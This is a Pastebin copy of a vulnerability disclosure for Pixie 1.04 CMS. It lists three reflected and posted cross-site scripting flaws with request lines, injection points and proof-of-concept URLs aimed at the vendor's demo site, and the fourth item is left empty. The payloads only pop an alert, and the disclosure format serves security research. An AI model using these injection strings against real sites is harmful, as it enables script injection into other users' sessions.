Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Title: Pixie 1.04 CMS - Multiple XSS
- #Version: 1.04 (Latest ATM)
- #Vendor: getpixie.co.uk
- #Demo: demo.getpixie.co.uk
- #Date: 01.26.2014
- #Contact: smash[at]devilteam.pl
- 1. Cross Site Scripting - GET 'm' parameter
- Request:
- host/?s=login&m=forgotten" onload=alert(666) bad="
- Injection point:
- <body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\"">
- PoC:
- demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad="
- 2. Cross Site Scripting - POST message
- Request:
- POST /admin/admin/modules/ajax_message.php HTTP/1.1
- Host: demo.getpixie.co.uk
- message=<script>alert(666)</script>
- Response:
- HTTP/1.1 200 OK
- Date: Sun, 26 Jan 2014 12:08:09 GMT
- Server: Apache
- X-Powered-By: PHP/5.3.28
- Cache-Control: max-age=1
- Expires: Sun, 26 Jan 2014 12:08:10 GMT
- Content-Length: 264
- Keep-Alive: timeout=2
- Connection: Keep-Alive
- Content-Type: text/html; charset=utf-8
- <span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back »</a>)</span>
- 3. Cross Site Scripting - GET 'x' parameter
- Request:
- host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
- Injection point:
- <body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\"">
- (...)
- <script type="text/javascript" src="jscript/pixie.js.php?s=login&x=page-1\" onload=alert(666) bad=\"&advmode=Toggle advanced Mode"></script>
- PoC:
- demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
- 4.
- # DC72E3C143B5E0DE 1337day.com [2014-01-28] C9DE7F0E49DF30F3 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
